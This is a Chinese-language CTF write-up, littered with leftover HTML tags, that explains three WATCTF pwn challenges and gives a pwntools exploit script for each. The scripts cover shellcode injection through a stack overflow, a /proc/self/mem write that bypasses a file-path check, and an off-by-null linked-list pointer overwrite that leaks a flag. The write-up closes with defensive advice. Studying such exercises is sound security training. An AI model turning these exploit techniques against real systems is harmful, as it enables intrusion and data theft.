WATCTF PWN 题目解析与利用技术教学<\/h1>

1. intro2pwn 题目解析<\/h2>

1.1 题目分析<\/h3>
这是一个基础的栈溢出题目，具有以下特点：<\/p>
架构：amd64-64-little<\/li>
保护机制：
无RELRO保护<\/li>
存在栈Canary<\/li>
栈可执行(Stack: Executable)<\/li>
无PIE保护<\/li>
存在RWX段<\/li> <\/ul> <\/li> <\/ul>
1.2 漏洞利用<\/h3>
关键漏洞点：<\/p>
程序直接使用scanf("%s", buf)<\/code>读取输入，没有限制长度，导致栈溢出<\/li>
程序会打印出buf的地址(printf("Addr: %p\n", buf)<\/code>)<\/li>
栈可执行且知道栈地址<\/li>
<\/ol>
利用思路：<\/p>

利用栈溢出覆盖返回地址<\/li>
在栈上布置shellcode<\/li>
将返回地址覆盖为栈上shellcode的地址<\/li>
<\/ol>
1.3 利用代码<\/h3>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>
<\/span><\/span>context.<\/span>arch =<\/span> 'amd64'<\/span>
<\/span><\/span>context.<\/span>os =<\/span> 'linux'<\/span>
<\/span><\/span>
<\/span><\/span>p =<\/span> remote("challs.watctf.org"<\/span>, 1991<\/span>)
<\/span><\/span>
<\/span><\/span># 接收栈地址<\/span>
<\/span><\/span>reu(b<\/span>": "<\/span>)
<\/span><\/span>stack_addr =<\/span> int(re(14<\/span>),16<\/span>)
<\/span><\/span>print(hex(stack_addr))
<\/span><\/span>
<\/span><\/span># 构造payload: shellcode + padding + 返回地址<\/span>
<\/span><\/span>payload =<\/span> asm(shellcraft.<\/span>sh())
<\/span><\/span>payload =<\/span> payload.<\/span>ljust(0x58<\/span>, b<\/span>"<\/span>\x00<\/span>"<\/span>)
<\/span><\/span>payload +=<\/span> p64(stack_addr)
<\/span><\/span>
<\/span><\/span># 发送payload<\/span>
<\/span><\/span>sela(b<\/span>"<\/span>\n<\/span>"<\/span>, payload)
<\/span><\/span>
<\/span><\/span># 交互模式<\/span>
<\/span><\/span>p.<\/span>interactive()
<\/span><\/span><\/code><\/pre>2. hex-editor-xtended-v2 题目解析<\/h2>
2.1 题目分析<\/h3>
这是一个十六进制编辑器程序，具有以下特点：<\/p>

架构：amd64-64-little<\/li>
保护机制：

Partial RELRO<\/li>
存在栈Canary<\/li>
NX enabled<\/li>
无PIE保护<\/li>
<\/ul>
<\/li>
<\/ul>
关键限制：<\/p>

程序禁止访问\/secret.txt<\/code>文件<\/li>
使用realpath<\/code>和strncmp<\/code>组合检查路径<\/li>
<\/ul>
2.2 漏洞利用<\/h3>
利用思路：<\/p>

利用\/proc\/self\/mem<\/code>文件可以读写程序自身内存的特性<\/li>
修改内存中硬编码的"\/secret.txt"<\/code>字符串<\/li>
绕过路径检查后读取\/secret.txt<\/code><\/li>
<\/ol>
关键步骤：<\/p>

打开\/proc\/self\/mem<\/code>文件<\/li>
定位到.rodata<\/code>段中"\/secret.txt"<\/code>字符串的地址(0x49704E)<\/li>
修改字符串的第一个字符为\x00<\/code><\/li>
再次尝试打开\/secret.txt<\/code><\/li>
<\/ol>
2.3 利用代码<\/h3>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>
<\/span><\/span>p =<\/span> process(".\/pwn"<\/span>)
<\/span><\/span>
<\/span><\/span># 打开内存文件<\/span>
<\/span><\/span>sela(b<\/span>"> "<\/span>, b<\/span>"open \/proc\/self\/mem"<\/span>)
<\/span><\/span>
<\/span><\/span># 修改.rodata中的"\/secret.txt"字符串<\/span>
<\/span><\/span>sela(b<\/span>"> "<\/span>, b<\/span>"set "<\/span> +<\/span> str(0x49704E<\/span>).<\/span>encode() +<\/span> b<\/span>" "<\/span> +<\/span> hex(0x0<\/span>).<\/span>encode())
<\/span><\/span>sela(b<\/span>"> "<\/span>, b<\/span>"set "<\/span> +<\/span> str(0x49704E<\/span>).<\/span>encode() +<\/span> b<\/span>" "<\/span> +<\/span> hex(0x0<\/span>).<\/span>encode())
<\/span><\/span>
<\/span><\/span># 现在可以打开\/secret.txt了<\/span>
<\/span><\/span>sela(b<\/span>"> "<\/span>, b<\/span>"open \/secret.txt"<\/span>)
<\/span><\/span>
<\/span><\/span># 读取flag内容<\/span>
<\/span><\/span>for<\/span> i in<\/span> range(50<\/span>):
<\/span><\/span>    sela(b<\/span>"> "<\/span>, b<\/span>"get "<\/span> +<\/span> str(i).<\/span>encode())
<\/span><\/span>    print(chr(int(re(2<\/span>),16<\/span>)), end =<\/span> ""<\/span>)
<\/span><\/span>
<\/span><\/span>p.<\/span>interactive()
<\/span><\/span><\/code><\/pre>3. person-tracker 题目解析<\/h2>
3.1 题目分析<\/h3>
这是一个人员信息管理程序，具有以下特点：<\/p>

架构：amd64-64-little<\/li>
保护机制：

Partial RELRO<\/li>
存在栈Canary<\/li>
NX enabled<\/li>
无PIE保护<\/li>
<\/ul>
<\/li>
<\/ul>
关键数据结构：<\/p>
typedef<\/span> struct<\/span> Person {
<\/span><\/span>    uint64_t<\/span> age;
<\/span><\/span>    char<\/span> name[24<\/span>];
<\/span><\/span>    struct<\/span> Person *<\/span>next;
<\/span><\/span>} Person;
<\/span><\/span><\/code><\/pre>漏洞点：<\/p>

存在null-by-one漏洞，可以修改链表指针<\/li>
<\/ul>
3.2 漏洞利用<\/h3>
利用思路：<\/p>

创建多个Person结构体<\/li>
利用null-by-one漏洞修改链表指针<\/li>
构造一个Person结构体指向flag的内存地址(0x49B21E)<\/li>
通过查看功能泄露flag<\/li>
<\/ol>
3.3 利用代码<\/h3>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>
<\/span><\/span>p =<\/span> remote("challs.watctf.org"<\/span>, 5151<\/span>)
<\/span><\/span>
<\/span><\/span>def<\/span> add<\/span>(age, name):
<\/span><\/span>    sela(b<\/span>": "<\/span>, str(1<\/span>).<\/span>encode())
<\/span><\/span>    sela(b<\/span>": "<\/span>, str(age).<\/span>encode())
<\/span><\/span>    sela(b<\/span>": "<\/span>, name)
<\/span><\/span>
<\/span><\/span>def<\/span> show<\/span>(index, choice):
<\/span><\/span>    sela(b<\/span>": "<\/span>, str(2<\/span>).<\/span>encode())
<\/span><\/span>    sela(b<\/span>": "<\/span>, str(index).<\/span>encode())
<\/span><\/span>    sela(b<\/span>": "<\/span>, str(choice).<\/span>encode())
<\/span><\/span>
<\/span><\/span># 创建多个Person结构体<\/span>
<\/span><\/span>for<\/span> i in<\/span> range(4<\/span>):
<\/span><\/span>    add(10<\/span>, b<\/span>"A"<\/span>*<\/span>8<\/span>)
<\/span><\/span>
<\/span><\/span># 利用null-by-one漏洞修改指针<\/span>
<\/span><\/span>add(10<\/span>, b<\/span>"A"<\/span>*<\/span>0x8<\/span> +<\/span> p64(0x49B21E<\/span>-<\/span>0x8<\/span>))
<\/span><\/span>add(10<\/span>, b<\/span>"Z"<\/span>*<\/span>24<\/span>)
<\/span><\/span>
<\/span><\/span># 查看flag<\/span>
<\/span><\/span>show(2<\/span>, 2<\/span>)
<\/span><\/span>
<\/span><\/span>p.<\/span>interactive()
<\/span><\/span><\/code><\/pre>4. 关键技术总结<\/h2>
4.1 栈溢出利用技术<\/h3>

当栈可执行且知道栈地址时，可以直接在栈上布置shellcode<\/li>
需要精确计算偏移量覆盖返回地址<\/li>
利用程序打印的地址信息定位shellcode位置<\/li>
<\/ul>
4.2 内存文件利用技术<\/h3>

\/proc\/self\/mem<\/code>可以读写进程自身内存<\/li>
绕过内存保护机制，直接修改只读段数据<\/li>
需要准确定位目标数据的内存地址<\/li>
<\/ul>
4.3 堆利用技术<\/h3>

利用null-by-one漏洞修改链表指针<\/li>
通过精心构造的链表实现任意地址读写<\/li>
需要了解堆布局和内存管理机制<\/li>
<\/ul>
5. 防御建议<\/h2>


对于栈溢出：<\/p>

启用栈保护(Stack Canary)<\/li>
禁用栈执行(NX)<\/li>
使用安全的输入函数<\/li>
<\/ul>
<\/li>

对于内存文件利用：<\/p>

避免将敏感数据硬编码在程序中<\/li>
对文件路径进行更严格的检查<\/li>
考虑使用只读内存区域存储关键数据<\/li>
<\/ul>
<\/li>

对于堆利用：<\/p>

检查所有内存操作边界<\/li>
使用安全的链表实现<\/li>
启用更严格的堆保护机制<\/li>
<\/ul>
<\/li>
<\/ol>
通过这三个题目的分析，可以学习到基础的PWN技术栈溢出、内存文件利用和堆利用技术，这些都是CTF PWN题目中的常见考点。<\/p>